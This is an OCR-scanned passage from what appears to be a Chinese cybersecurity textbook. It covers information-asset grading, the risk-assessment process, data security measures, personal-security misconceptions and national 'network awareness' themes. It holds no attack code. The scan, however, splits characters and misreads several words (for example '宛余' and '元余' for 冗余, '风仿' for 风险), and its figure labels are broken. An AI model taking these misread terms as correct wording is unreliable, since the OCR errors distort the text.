逻辑 访问 安全 ,是 指 关键 和 敏感 的 数据 在 网 络 传输 和 存储 上 不 被 非法 访问 ,所 以 需 
要 加 密 技术 、 认 证 技术 .数字 签名 与 访问 控制 等 手段 来 实现 其 数据 的 传输 和 存储 的 安全 


#@: 网 络 安 全 纵 切 面 
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性 。 备 份 是 指 通过 一 种 数据 安全 策略 ,将 原始 数据 按照 一 定 的 方式 复制 并 保存 到 各 种 介 
质 上 。 其 备份 类 型 包括 系统 数据 备份 和 用 户 数 据 备份 、 热 备份 和 冷 备份 ,以 及 镜像 备份 
和 文件 备份 。 要 实现 一 个 完整 的 数据 备份 和 灾难 恢复 ,就 需要 相应 的 备份 硬件 .备份 软 
件 、 备 份 策略 和 计划 以 及 暂时 恢复 技术 等 几 个 方面 。 实 现 对 数据 的 远程 数据 实时 存储 ， 
来 保证 存储 数据 的 安全 性 。 

2) 有 形 资产 安全 (物理 安全 ) 

环境 安全 ,主要 指 的 是 设备 系统 的 硬 软 件 所 在 环境 的 安全 状况 。 而 需求 的 环境 是 安 
静 的 覆盖 面 合理 的 .地理 通道 方便 的 、 温 度 和 湿度 合适 的 等 。 设备 安全 ,看 设备 的 防盗 、 
防 毁 、 防 电磁 泄露 .防止 线路 截断 、 抗 电磁 干扰 及 电源 保护 。 媒 体 安全 ,包括 数据 的 安全 
和 介质 安全 ,而 通常 是 通过 宛 余 和 容错 提供 可 靠 性 和 故障 恢复 的 可 用 性 。 管 理 安全 ,是 
首 对 设备 的 日 常安 全 运 维 的 相关 记录 是 否 形 成 了 文档 ,如 出 和 人 设备 机 房 的 相关 人 员 的 


记录 。 


信息 资产 的 分 类 方法 如 表 2. 1 所 示 。 


表 2.1 信息 资产 的 分 类 方法 


资产 分 类 资产 解释 
设备 电源 ,空调 ,保险 柜 、 文 件 柜 、 门 禁 系 统 、 消 防 设施 等 
数据 源码 ,数据 库 数据 、 系 统 文档 、 计 划 ,报告 ,使 用 手册 等 存在 存储 介质 中 的 信息 
文档 纸 质 文件 .财务 报告 、 运 管 规定 、 电 报 传真 等 
软件 应 用 系统 .软件 系统 .开发 工具 和 资料 库 等 
硬件 计算 机 硬件 、 路 由 器 、 交 换 机 ,硬件 防火 墙 \ 程 控 交 换 机 、 不 限 、 备 份 存储 设备 等 
服务 操作 系统 、Web、SMTP、POP3、FTP、DNS、 呼 叫 中 心 等 应 用 服务 
人 员 管理 人 员 ,一 般 员工 等 


合理 的 对 资产 进行 识别 之 后 ,应 当 对 资产 的 价值 进行 定量 的 划分 ,从 资产 的 保密 性 、 
实用 性 、 完 整 性 等 方面 考虑 其 对 企业 存在 的 影响 ,用 相应 的 等 级 进行 量化 。 如 表 2. 2 所 
示 ,为 资产 等 级 划分 表 ,把 资产 分 为 了 5 个 等 级 ,等 级 越 高 ,其 价值 就 越 大 。 


表 2.2 资产 等 级 划分 表 


级 别 含 党 描 述 
4 极 高 资产 价值 最 高 ,其 安全 问题 可 导致 致命 的 危害 
3 高 资产 价值 较 高 ,其 安全 影响 程度 较 大 ,难以 恢复 
2 中 
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M+: 


2. 风险 分 析 


组 织 与 企业 的 网 络 是 否 存在 风险 和 是 否 安全 ,不 是 凭空 猜测 ,而 是 通过 各 种 网 络 安 
全 规章 条 例 和 相应 的 检测 手段 来 判断 的 。 所 以 ,在 对 企业 网 络 进行 安全 风险 分 析 之 前 ， 
组 织 与 企业 必须 先 做 一 次 安全 评估 。 通 过 安全 评估 可 以 准确 地 判断 出 组 织 与 企业 网 络 
中 存在 的 问题 和 漏洞 ,并 以 此 分 析 这 些 问题 和 漏洞 可 能 给 组 织 与 企业 带 来 哪些 不 良 后 
果 。 安 全 评估 可 以 让 组 织 与 企业 的 网 管 人 员 了 解 到 自己 组 织 与 企业 网 络 存在 的 隐患 及 
相应 的 解决 方案 。 当 了 解 和 解决 了 相应 的 安全 隐患 之 后 , 便 可 及 时 做 出 调整 应 对 ,让 组 
织 与 企业 的 管理 更 加 可 靠 ,成 本 更 低 , 使 组 织 与 企业 更 健康 的 发 展 。 而 网 络 安全 的 风险 
分 析 主 要 包括 网 络 构架 的 分 析 、 网 络 安全 设备 的 分 析 、 网 络 设备 配置 的 分 析 及 正 向 和 反 
向 的 对 网 络 进行 监测 ,以 此 来 判断 该 网 络 所 存在 的 安全 问题 。 

风险 评估 有 4 个 需要 考虑 的 因素 : 信息 资产 及 其 价值 .可 能 的 威胁 、 安 全 脆弱 点 和 风 
仿造 成 的 影响 ,风险 评估 是 将 其 作为 核心 内 容 围 绕 它们 展开 ,它们 之 间 的 关系 如 图 2. 8 
所 示 。 


脆弱 点 | 己 > 


2.8 ”风险 要 素 关系 图 


风险 评估 工作 是 从 风险 评估 准备 过 程 开始 的 ,然后 分 别 对 三 要 素 进行 评估 ,在 对 已 
有 安全 措施 确认 后 进行 风险 计算 ,经 过 一 系列 的 识别 措施 ,最 后 进入 实施 风险 管理 阶段 。 
其 流程 图 如 图 2.9 所 示 。 

其 中 ,作为 评估 基础 的 风险 评估 准备 阶段 ,也 是 整个 风险 评估 工作 有 效 性 的 保证 。 
企业 可 能 由 于 把 自身 网 络 信息 系统 的 风险 评估 作为 一 种 战略 性 的 考虑 ,其 评估 结果 可 能 
会 受到 组 织 与 企业 所 经 营业 务 需求 及 文化 规模、 结构 .战略 目标 和 网 络 安全 需求 的 
影响 。 

常用 的 系统 软件 评估 工具 有 X-SCAN、 CyberCop Scanner、NESSUS、NMAP、 
Nstalker、SQLIX 等 。 常 见 的 安全 管理 评价 工具 ,如 COBRA(Consultative, Objective 
and Bi-functional Risk Analysis)、CRAMM (CCCTA Risk Analysis and Management 
Method)、ASSET 等 。 


3. 数据 安全 


数据 安全 主要 包括 服务 器 ,用户 终 端 与 数据 库 等 方面 的 数据 存储 和 恢复 安全 、 数 据 
传输 的 安全 数据 访问 权限 的 安全 、 移 动 存储 设备 管理 及 网 络 安全 运行 应 急 预 案 管理 等 
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风险 评估 的 准备 


1 1 L 
资产 评估 威胁 评估 脆弱 点 评估 | 
1 
已 有 安全 措施 的 确认 


有 
风险 计算 


保持 已 有 的 控制 策略 风险 是 否 被 接受 


选择 适当 的 控制 措施 
并 评估 残余 风险 


实施 风险 管理 
2.9 风险 评估 流程 图 


方面 。 组 织 与 企业 的 数据 是 否 安全 是 组 织 与 企业 网 络 安全 的 核心 。 
4. 数据 存储 和 恢复 安全 


数据 的 存储 安全 包括 数据 本 身 的 安全 及 存储 介质 的 安全 。 数 据 本 身 的 安全 主要 指 
该 数据 是 否 被 感染 了 病毒 ,以 及 是 否 对 数据 进行 加 密 等 。 存 储 介质 的 安全 主要 是 指 该 数 
据 是 否 有 元 余 和 容错 功能 。 一 般 数据 的 存储 安全 ,主要 利用 包括 本 地 备份 与 异地 备份 等 
的 备份 技术 来 实现 对 数据 安全 有 效 的 存储 和 管理 ,同时 也 保证 了 数据 有 效 的 恢复 机 制 。 


5. 数据 传输 安全 


数据 传输 安全 主要 是 保证 当 数据 被 不 法 分 子 截获 之 后 ,使 其 不 能 破解 数据 的 内 容 。 
而 数据 安全 传输 的 手段 包括 链 路 上 的 安全 和 数据 本 身 的 安全 。 链 路 上 的 安全 技术 包括 
专线 `VPN 技术 等 。 数 据 本 身 的 安全 主要 是 指 对 传输 的 数据 进行 相应 的 加 密 ,并 且 有 相 
应 的 解密 方法 ,以 此 来 实现 数据 的 传输 安全 。 


6. 数据 访问 权限 安全 


数据 访问 权限 是 指 对 不 同 权 限 级 别 的 用 户 给 其 相应 的 权限 ,如 ,对 于 管理 员 可 以 对 
其 赋予 所 有 的 权限 ,但 对 于 一 般 的 用 户 可 以 只 赋予 读 的 权限 。 也 可 以 通过 ACL 来 控制 
用 户 是 否 可 以 访问 等 ,权限 又 可 细 分 为 完全 控制 ,修改 、 读 取 和 运行 读 取 、 写 入 及 特别 的 
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权限 等 。 所 以 把 用 户 访问 数据 的 权限 进行 相应 的 限制 ,可 以 保证 数据 的 安全 。 
7. 移动 存储 设备 管理 


数据 对 于 组 织 与 企业 来 说 是 一 种 无 形 资产 ,所 以 对 数据 的 复制 要 做 一 个 严格 的 限 
制 。 而 复制 工具 最 常见 的 是 磁盘 、 光 盘 、U 盘 和 移动 硬盘 等 移动 存储 介质 ,所 以 需要 对 移 
动 存储 介质 的 使 用 进行 限制 ,对 其 注册 、 使 用 \ 存 放 及 销毁 要 有 相应 的 具体 制度 。 


8. 网 络 安全 运行 应 急 预 案 


网 络 安全 运行 应 急 预 案 可 以 使 网 络 在 出 现 意 外 的 崩溃 或 者 网 络 运行 不 正常 时 ,保证 
组 织 与 企业 在 最 短 的 时 间 内 响应 该 故障 ,使 组 织 与 企业 的 损失 减 到 最 少 。 所 以 ,对 于 网 
络 安 全 运行 应 急 预 案 必须 做 到 应 急 物 质 的 完备 性 ,包含 人 员 保 障 、 人 员 应 急 能 力 等 方面 
的 人 员 确 定性 等 。 


9. 网络 构架 安全 


网 络 构架 安全 是 为 设计 、 构 建 和 管理 一 个 安全 网 络 提供 一 个 构架 和 技术 基础 的 蓝 
图 。 网 络 构架 定义 了 数据 网 络 通信 系统 的 每 个 方面 ,包括 使 用 的 网 络 协议 ,布线 类 型 . 接 
口 类 型 等 ,当然 还 包括 安全 。 所 以 ,构架 安全 是 组 织 与 企业 级 网 络 安全 的 首要 条 件 , 是 整 
个 网 络 安全 的 源头 。 一 个 良好 的 网 络 构架 拥有 出 色 的 安全 设计 方案 ,不 但 可 以 利用 各 个 
网 络 设备 进行 安全 联动 以 增强 网 络 的 安全 ,而且 要 具有 较 高 的 可 管理 性 和 后 期 的 可 延展 
性 。 然 而 ,良好 的 网 络 构架 则 源 于 最 初 的 网 络 建设 , 源 于 优秀 的 网 络 设计 和 高 质量 的 网 
络 架设 。 因 此 ,要 实现 现代 组 织 与 企业 级 网 络 安全 ,我 们 需 从 网 络 建设 初期 就 必须 将 网 
络 安全 作为 重点 考虑 对 象 ,后 期 网 络 扩展 也 同样 要 秉承 这 种 思想 。 


10. 威胁 确定 


如 今 网 络 威胁 种 类 繁多 ,而 且 是 在 逐年 递增 ,大 的 类 型 有 勘测 攻击 \ 访 问 攻 击 、 拒 绝 
访问 攻击 等 。 细 分 下 来 更 是 不 胜 枚 举 , 如 扫描 攻击 会 话 攻击 、 洪 水 攻击 、 各 类 病毒 入侵 
等 。 当 用 户 的 网 络 出 现 了 网 络 违规 事件 ,用户 能 和 否 准确 地 判断 网 络 正 在 遭受 什么 类 型 的 
攻击 ”判定 的 依据 又 是 什么 ? 这些 问 题 都 让 企业 网 络 管理 人 员 痛 心 疾 首 。 完 整 的 安全 
评估 能 帮助 用 户 解决 这 些 棘 手 的 问题 。 评 估 小 组 拥有 资深 的 网 络 安全 专家 和 先进 的 实 
验 室 。 有 了 这 些 条 件 ,组织 与 企业 的 安全 威胁 确定 将 不 再 困难 。 首 先 ,评估 小 组 会 向 企 
业 管 理 人 员 索 取 相 关 文 档 以 了 解 网 络 的 架构 ,包括 拓扑 环境 .网 络 设备 的 型 号 与 功能 以 
及 当前 的 设置 .网络 上 运行 的 各 种 应 用 服务 情况 、 故 障 历史 记录 等 。 对 组 织 与 企业 网 络 
架构 作 初 步 了 解 , 安 全 评估 小 组 将 会 对 网 络 做 前 期 的 安全 评估 ,涉及 网 络 结构 、 网 络 设 备 
性 能 、 服 务 器 操作 系统 、 应 用 服务 等 。 还 有 网 络 流量 的 取证 评估 , 它 是 威胁 确定 的 关键 性 
因素 。 无 论 什么 类 型 的 网 络 攻 击 , 都 将 通过 网 络 传 送 攻 击 数据 包 , 评 估 小 组 可 以 通过 对 
数据 流 的 分 析 , 来 判断 网 络 是 否 遭 受到 攻击 。 如 果 正 遭受 攻击 ,还 能 确定 所 遭受 攻击 的 
类 型 ,评估 小 组 将 对 照 所 制定 好 的 威胁 等 级 ,给 予 组 织 与 企业 相应 的 安全 报警 。 评 估 小 
组 也 会 根据 威胁 等 级 做 出 相应 的 应 急 处 理 方案 。 


OO: 网 络 安 全 纵 切 面 
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11. 策略 制定 与 安全 加 固 


安全 策略 是 一 系列 用 于 影响 、 规 范 组 织 与 企业 人 员 行 为 的 文案 计划 或 条 例 规定 。 它 
存在 的 目的 就 在 于 增强 某 个 特定 的 规则 ,让 该 组 织 与 企业 按照 规定 程序 执行 动作 。 组 织 
与 企业 的 所 有 设备 或 服务 的 安全 规则 、 规 范 等 都 是 由 该 组 织 与 企业 的 整体 安全 策略 所 决 
定 的 。 而 组 织 与 企业 的 所 有 安全 项 目 都 是 在 组 织 与 企业 大 的 安全 策略 框架 下 被 制定 出 
来 的 。 安 全 策略 的 制定 首先 要 与 组 织 与 企业 的 目标 保持 一 致 ,并 符合 网 络 管理 目标 的 要 
求 。 所 以 在 明确 了 组 织 与 企业 对 于 网 络 的 发 展 目标 和 该 行业 的 整体 安全 策略 之 后 ,可 以 
整合 前 期 的 安全 评估 信息 ,制定 一 套 完善 的 安全 策略 来 影响 组 织 与 企业 的 全 体 用 户 , 规 
范 其 行为 ,以 应 对 目前 及 未 来 的 安全 挑战 。 

通过 前 期 的 安全 评估 和 实验 室 对 评估 数据 放样 测试 之 后 ,评估 小 组 会 把 评估 测试 报 
告 交 给 企业 信 管 人 员 。 内 容 包 括 网 络 结构 分 析 、 网 络 设备 性 能 分 析 、 服 务 器 操作 系统 分 
析 、 采 样 数 据 帧 ,日志 分 析 、 应 用 服务 分 析 、 接 入 安全 分 析 等 方面 。 同 时 ,评估 小 组 会 根据 
分 析 结 构 向 组 织 与 企业 提供 相应 的 解决 方案 。 最 后 ,与 组 织 与 企业 进行 安全 调研 综合 分 
析 ,结合 行业 标准 框架 .组 织 与 企业 需求 .评估 结构 制定 出 一 套 完 整 的 网 络 安全 加 固 方 
案 。 通 过 实施 这 一 系列 的 策略 ,让 组 织 与 企业 网 络 成 为 一 个 安全 实体 ,一 个 符合 行业 标 
准 的 组 织 与 企业 级 安全 网 络 。 


12. 安全 应 急 预案 


安全 应 急 预 案 是 安全 策略 不 可 缺少 的 一 部 分 。 对 于 组 织 与 企业 级 网 络 来 说 ,安全 违 
规 事件 的 发 生 往往 是 突然 性 的 ,让 人 措手不及 。 所 以 建立 完备 的 安全 应 急 机 制 是 必 不 可 
少 的 。 首 先 , 应 该 建立 一 个 应 急 反 应 小 组 ,专门 负责 处 理 突 发 安全 违规 事件 。 其 次 ,制定 
出 整体 应 急 预案 和 各 系统 的 应 急 预 案 ,检查 应 急 物 资 是 否 准备 齐全 。 最 后 ,定期 举行 安 
全 应 急 演 练 。 


23 个 人 网 络 安全 


2015 年 7 月 22 日 ,中 国 互联 网 协会 发 布 的 (中 国 网 民权 益 保 护 调查 报告 (2015)》 显 
示 , 中 国 网 民 信 息 泄 露 问题 “非常 严重 ”: 63. 4% 的 网 民 通话 记录 、 网 上 购物 记录 、 网 站 浏 
览 痕迹 、IP 地 址 等 网 上 活动 信息 遭 泄露 ;78. 2% 的 网 民 个 人 身份 信息 曾 被 泄露 ,包括 姓 
名 、 家 庭 住 址 .身份 证 号 及 工作 单位 等 ; 约 七 成 网 民 网 上 活动 信息 和 个 人 身份 信息 均 被 
泄露 


隐私 权 遭 侵害 的 后 果 已 经 显现 。 根 据 人 报告 ). 近 一 年 来 中 国 网 民 因 信息 泄露 .诈骗 
信息 等 总 体 损失 约 805 亿 元 ,人 均 124 元 ;其 中 , 约 4500 万 网 民 遭 受 的 经 济 损失 超过 
1000 元 。 

该 报告 指出 ,当前 我 国 公众 网 络 安全 意识 不 强 ,网 络 安全 知识 和 技能 琶 需 提升 ， 
83.48% 的 网 民 网 上 支付 行为 存在 安全 隐患 。 报 告 还 指出 ,定期 更 换 密码 对 于 保障 个 人 
账户 安全 防止 个 人 隐私 泄露 具有 重要 意义 。 但 此 次 调查 中 ,定期 更 换 密码 的 被 调查 者 
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仅 占 18.36% ,而 遇 到 问题 才 更 换 密码 的 被 调查 者 只 有 64. 59%, 有 17.05% 的 被 调查 者 
从 来 不 更 换 密码 ,更 有 10. 88% 的 被 调查 者 仍 在 使 用 123456 或 abcabc 等 简单 数字 或 字 
母 作为 密码 。 值 得 关注 的 是 ,多 账户 使 用 同一 密码 更 容易 受到 黑客 攻击 。 但 报告 显示 ， 
我 国 多 账户 使 用 同一 密码 的 问题 非常 突出 ,75. 93% 的 被 调查 者 存在 这 一 问题 ,而 青少年 
多 账户 使 用 同一 密码 的 情况 更 为 严重 ,比例 高 达 82. 39% 。 数 据 显示 ,83. 48% 的 网 民 网 
上 支付 行为 存在 安全 隐患 ,其 中 42. 55% 的 网 民 使 用 公共 计算 机 网 络 支付 后 没 消除 上 网 
痕迹 ,38. 96% 的 网 民 使 用 无 密码 Wi-Fi 进行 网 络 支付 。 报 告 还 指出 ,公共 免费 Wi-Fi 安 
全 性 低 ,容易 导致 个 人 信息 泄露 。 但 报告 显示 ,被 调查 者 中 随意 使 用 公共 免费 Wi-Fi 的 
比例 高 达 80%。 

从 该 报告 可 以 看 出 我 们 当前 个 人 网 络 安全 形势 非常 严峻 。 但 我 们 应 知道 ,个 人 网 络 
安全 是 有 区 别 于 组 织 、 企 业 与 国家 网 络 安全 的 。 有 一 句 话 说 得 很 明确 : 个 人 网 络 安全 防 
护 , 三 分 靠 技 术 , 七 分 靠 意 识 。 由 此 可 见 个 人 网 络 安全 意识 是 多 么 重要 。 


231 个 人 网 络 安全 常见 误区 


随 着 网 络 安 全 事件 与 个 人 隐私 泄露 的 频 发 ,例如 ,人 肉 搜 索 、 垃 圾 信息 、 诈 骗 邮 件 或 
电话 等 ,大 多 数 用 户 都 能 意识 到 个 人 网 络 安全 的 重要 性 。 但 遗憾 的 是 ,大 部 分 群众 还 存 
在 许多 显而易见 的 个 人 网 络 安全 误区 ,而 且 大 部 分 错误 的 观点 仍然 在 互联 网 上 口 口 相 
传 。 常 见 的 个 人 网 络 安全 误区 如 下 。 


1. 个 人 网 络 安全 并 不 重要 


有 很 大 一 部 分 群众 认为 自身 网 络 安 全 是 没有 价值 的 ,与 其 花 时 间 在 这 方面 不 如 去 做 
点 别 的 。 常 见 的 论调 有 :“ 我 的 电脑 里 没有 什么 重要 文件 ”“ 我 不 使 用 网 银 ”“ 我 不 使 用 
电脑 炒股 ”“ 我 电脑 里 没什么 值钱 的 ,黑客 花 时 间 在 我 身上 不 如 去 黑 一 些 有 重要 信息 的 
主机 ”等 。 但 事实 真是 如 此 吗 ? 实际 上 并 不 是 这 样 。 不 管 是 多 么 谨慎 地 使 用 电脑 ,用 户 
总 是 会 在 不 自觉 中 留 下 痕迹 。 例 如 ,邮箱 .手机 信息 .生日 等 。 再 结合 其 他 渠道 获取 的 信 
息 ,例如 ,网 上 广 为 流 传 的 2000 万 开房 记录 、 各 种 流出 的 数据 库 等 ,可 以 帮助 他 们 进一步 
展开 社会 工程 学 攻击 ,黑客 可 能 对 你 或 者 你 的 亲人 、 朋 友 进 行 线 下 诈骗 或 开展 其 他 手段 。 
例如 ,最 近 一 个 很 常见 的 诈骗 手段 是 冒充 领导 给 受害 者 打 电 话 , 一 般 是 接 起 电话 就 问 受 
害 者 他 是 哪个 领导 ,一 般 群众 很 快 就 能 识别 出 这 是 骗子 ,但 若是 对 方 一 开口 就 指名 道 姓 ， 
能 准确 说 出 工作 ,住宅 位 置 与 其 他 一 些 私密 信息 ,有 和 多少 本 不 会 上 当 受 骗 的 无 率 群 众 会 
受骗 呢 ? 此 外 网 络 罪犯 不 光 会 利用 这 些 隐 私信 息 展 开 社 会 工程 学 攻击 ,还 会 通过 技术 手 
段 开展 攻击 。 现 今 无 线 网 络 安全 问题 本 就 十 分 令 人 头疼 ,若是 电脑 完全 不 设防 ,黑客 还 
能 侵入 家 庭 路 由 器 、 其 他 笔记 本 电脑 .手机 等 家 庭 联网 设备 ,将 这 些 设 备 变 成 他 们 发 动 拒 
绝 服务 攻击 的 僵尸 客户 端 。 黑 客 能 利用 受害 者 的 电脑 开展 对 别 的 主机 的 攻击 。 因 此 加 
强 安全 意识 ,采取 适当 的 安全 手段 ,不 仅 对 个 人 隐私 是 一 种 保障 ,也 是 对 网 络 上 其 他 用 户 
的 一 种 责任 。 


#@: 网 络 安 全 纵 切 面 
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2. 黑客 是 互联 网 最 大 的 威胁 


在 互联 网 上 确实 存在 着 一 些 坏人 ,他 们 利用 各 种 手段 获取 个 人 隐私 或 控制 受害 者 电 
脑 以 此 获 利 。 但 自从 斯 诺 登 事件 后 ,美国 的 棱镜 计划 遭 到 曝光 ,结合 近 几 年 来 出 现 了 越 
来 越 多 普通 组 织 或 个 人 很 难 实现 的 网 络 安全 威胁 ,以 国家 为 单位 的 网 络 安全 威胁 渐渐 浮 
出 水 面 。 当 一 个 国家 想 要 做 些 什么 动作 ,又 哪里 是 一 些 松散 的 组 织 或 个 人 能 够 比 得 上 
的 呢 ? 


3. 当 电脑 被 感染 时 ,电脑 会 有 某 些 征兆 


在 过 去 ,许多 电脑 被 感染 后 ,一 般 会 出 现 功能 性 故障 ,例如 ,蓝屏 、 死 机、 运行 效率 低 
下 等 。 这 就 造成 了 许多 群众 认为 电脑 一 旦 受到 恶意 软件 攻击 后 将 立即 崩溃 ,或 者 至 少 一 
些 功 能 或 某 些 程序 将 不 再 发 挥 作用 ,可 能 会 弹出 各 种 警告 消息 或 发 出 各 种 声音 来 提示 该 
主机 已 经 被 感染 。 刚 刚 描述 的 这 些 症状 ,实际 上 大 多 存在 于 过 去 的 恶意 程序 。 过 去 的 恶 
意 程 序 , 大 部 分 开发 目的 是 炫耀 编写 者 的 技能 ,检验 自 己 所 学 知识 或 只 是 纯粹 为 了 搞 破 
坏 , 但 当今 这 个 时 代 , 恶 意 程序 的 编写 者 大 多 是 在 技术 方面 有 所 成 就 的 专业 高 手 , 并 且 目 
的 也 很 明确 ,就 是 为 了 获取 更 多 利益 。 因 此 目前 极 少 有 电脑 感染 产生 崩溃 、 运 行 缓慢 、 弹 
出 提示 等 显著 特征 。 这 就 造成 了 大 部 分 用 户 看 到 自己 的 电脑 完美 的 运行 着 ,就 判断 电脑 
未 受 感染 ,而 身 处 僵尸 网 络 中 的 一 分 子 或 有 另外 一 个 人 默默 地 观察 你 的 一 举 一 动 但 不 
自 知 。 


4, 大 多 数 恶 意 程序 经 过 电子 邮件 或 U 盘 传 播 


许多 用 户 的 主机 都 曾经 通过 电子 邮件 感染 过 病毒 ,电子 邮件 可 以 称 为 到 目前 为 止 被 
利用 的 最 广泛 的 恶意 程序 传播 方式 。 我 们 在 先前 史上 发 生 的 网 络 安全 大 事件 中 通过 许 
多 实例 对 于 电子 邮件 传播 方式 有 所 了 解 , 也 通过 攻击 方式 对 钓鱼 和 垃圾 邮件 攻击 有 个 明 
晰 的 概念 。 随 着 垃圾 邮件 过 滤器 越 来 越 高 效 ,而且 许多 用 户 当 他 们 收 到 未 知 发 件 人 发 来 
的 邮件 时 选择 直接 删除 ,渐渐 的 恶意 程序 被 转移 到 恶意 网 站 。U 盘 作 为 恶意 程序 的 传播 
介质 ,恶意 程序 通过 U 盘 传 播 是 可 能 的 ,但 大 多 数 情况 仍 是 通过 恶意 网 站 传播 。 在 互联 
网 尚未 普及 的 年 代 , 软 盘 是 频繁 传播 恶意 程序 的 感染 源 。 当 U 盘 及 其 他 外 部 存储 设备 出 
现 后 ,许多 恶意 程序 通过 这 些 设 备 传播 。 但 当 我 们 进入 网 络 时 代 , 恶 意 网 站 超越 垃圾 邮 
件 .U 盘 传播 成 为 第 一 感染 点 。 


5. 不 访问 危险 的 站 点 或 不 打开 受 感染 的 文件 就 不 会 受到 感染 


这 种 说 法 也 是 建立 在 过 去 的 事实 基础 上 ,缺乏 知识 性 。 不 访问 恶意 站 点 确实 能 减少 
被 感染 的 可 能 性 ,但 不 访问 危险 站 点 并 不 能 完全 杜绝 感染 。 例 如 ,黑客 可 以 对 可 信赖 的 
网 站 偷偷 注入 恶意 代码 ,用户 浏 览 该 网 站 可 能 会 打开 一 个 0X0 像素 的 窗口 ,该 窗口 用 于 
启动 下 载 ,使 得 恶意 程序 悄悄 地 进入 到 用 户 的 计算 机 中 。 通 过 这 种 方法 网 络 犯罪 者 不 需 
要 专门 开设 恶意 网 站 ,只 要 渗透 到 一 些 流量 大 的 网 站 中 就 可 以 ,当然 这 种 攻击 也 不 是 那 
么 简单 就 能 实现 的 。 而 不 打开 受 感染 的 文件 就 不 会 受到 感染 ,这 是 显而易见 的 误区 。 许 
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多 恶意 程序 利用 安全 漏洞 等 ,有 可 能 被 自动 激活 。 因 此 这 种 观点 也 是 错误 的 。 

对 于 个 人 安全 防护 的 误区 还 有 很 多 ,例如 ,无 痕 浏 览 就 可 以 防止 隐私 被 窃取 、 使 用 
VPN 后 可 以 实现 完全 匿名 、 有 了 防火 墙 就 固 若 金 汤 ,等 等 。 这 些 都 是 简单 易学 的 知识 ， 
只 要 大 家 多 留意 身边 网 络 安全 咨询 ,多 关注 网 络 安全 相关 的 新 闻 ,报道 ,就 能 在 无 形 中 提 
高 自己 的 网 络 安全 知识 。 例 如 ,国家 每 年 都 会 开展 “国家 网 络 安全 宣传 周 ” 活 动 , 现 已 成 
功 举办 两 届 。 这 就 是 一 个 很 好 的 安全 咨询 来 源 。 


232 个 人 网 络 安全 意识 的 培养 


所 谓 安全 意识 ,就 是 人 们 头脑 中 建立 起 来 的 生产 必须 安全 的 观念 ,也 就 是 人 们 在 生 
产 活动 中 各 种 各 样 有 可 能 对 自己 或 他 人 造成 伤害 的 外 在 环境 条 件 的 一 种 戒备 和 警觉 的 
心理 状态 。 安 全 意识 也 指 的 是 人 们 发 现 可 能 存在 的 威胁 .判断 其 危害 性 并 及 时 预防 或 化 
解 威胁 的 一 种 能 力 。 加 强 自身 对 威胁 相关 知识 的 掌握 以 及 正确 的 使 用 习惯 可 以 提升 这 
种 能 力 。 这 也 就 是 我 们 常 说 的 提高 安全 意识 。 让 网 络 安全 意识 深入 人 心 ,就 需要 将 其 作 
为 网 络 强国 建设 的 基础 工程 ,突出 培养 “七 种 意识 ”。 


1. 网 络 主权 意识 


网 络 作 为 陆海空 天 之 外 的 “第 五 类 疆域 ", 国 家 必然 要 实施 网 络 空间 的 管辖 权 , 维 护 
网 络 空间 主权 。 在 移动 互联 是 “新 渠道 ”大 数据 是 “新 石油 ”、 智 慧 城市 是 “新 要 地 ”、 云 计 
算是 “新 能 力 ”、 物 联网 是 “新 未 来 ”的 网 络 时代 , 要 实现 中 华 民 族 的 伟大 复兴 ,就 必须 维护 
网 络 空间 主权 、 安 全 和 发 展 利益 ,始终 把 自己 的 命运 掌握 在 自己 手中 。 


2. 网 络 发 展 意识 


包罗 万 象 的 网 络 空 间 已 经 成 为 人 类 社会 的 共同 福 社 。 网 络 空 间 蕴含 的 新 质 生 产 力 ， 
不 仅 重新 定义 了 人 们 的 生活 生产 方式 ,更 成 为 世界 发 展 的 革命 性 力量 。 因 此 ,我 们 必须 
始终 坚持 发 展 就 是 硬 道理 ,始终 基于 网 络 空间 创新 驱动 发 展 ,将 世界 第 一 网 络 大 国 的 自 
信 , 转 化 为 建设 网 络 强 国 的 智慧 。 


3. 网 络 安全 意识 


让 “没有 网 络 安全 就 没有 国家 安全 ”的 意识 深入 人 心 , 让 “网 络 信息 人 人 共享 .网 络 安 
全 人 人 有 责 ? 的 意识 落地 生根 ,这 是 举行 国家 网 络 安全 宣传 周 的 目的 所 在 。 我 们 既 要 学 
会 用 老百姓 听 得 懂 的 语言 讲述 网 络 安全 风险 ,也 要 善于 用 群众 看 得 清 的 实力 化 解 网 络 安 
全 风险 ,让 网 络 安全 的 成 果真 正 惠 及 你 我 他 。 


4. 网 络 文化 意识 


互通 互联 的 网 络 空间 ,每 一 条 网 线 都 是 网 上 “新 丝 路 ”, 每 一 个 声音 都 是 网 上 “驼铃 
声 ”。 网 络 空间 为 我 们 提供 了 宣扬 中 华文 化 ,借鉴 世界 文明 前 所 未 有 的 新 平台 ,但 同时 ， 
网 上 意识 形态 斗争 也 日 趋 激烈 ,急需 树立 正确 的 网 络 文化 意识 。 
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5. 网 络 法 制 意识 


让 网 络 空间 晴朗 起 来 ,不 仅 要 大 力 宣 传 上 网 ,用 网 行为 规范 ,引导 人 们 增强 法 治 意 
识 ,做 到 依法 办 网 .依法 上 网 ,更 要 利用 法 律 武器 ,塑造 国际 网 络 秩序 。 为 此 ,必须 尽快 完 
善 网 络 空间 法 制 体系 ,让 国家 网 络 空间 治理 走向 法 制 化 的 快车 道 , 让 人 人 成 为 网 络 秩序 
的 维护 者 ,让 国家 网 络 治理 成 为 世界 网 络 治理 的 典范 。 


6. 网 络 国防 意识 。 


在 “全 球 一 网 ”的 时 代 , 面 对 网 络 强国 大 幅 扩 充 网 络 战 部 队 , 网 络 空间 明显 军事 化 的 
趋势 ,我 们 既 需 要 国际 层面 的 文化 实力 、 国 家 层面 的 法 制 效力 ,更 需要 军队 层面 的 军事 实 
力 。 中 国 建设 网 络 强国 ,成 为 网 络 空间 和 平 发 展 的 骨干 力量 ,发 展 网 络 空间 国防 力量 刻 
不 容 缓 。 


7, 网 络 合作 意识 


要 建立 和平、 安全、 开放 、 合 作 的 网 络 空间 ,多 边 、 民 主 、 透 明 的 国际 互联 网 治理 体 
系 ”, 就 必须 认识 到 , 面 对 网 络 霸权 主义 网 络 丽 怖 主义 、 网 络 自由 主义 和 网 络 犯罪 等 诸多 
共同 风险 ,任何 国家 都 无 法 独善其身 , 唯 有 加 强 合作 ,才能 同舟 共 济 、 启 得 未 来 。 


233 个 人 网 络 安全 的 第 一 道 防线 一 一 防 病毒 软件 和 防火 墙 


自从 计算 机 病毒 诞生 为 止 , 人 们 就 一 直 没 有 摆脱 它 的 困扰 。 在 计算 机 操作 系统 漏洞 
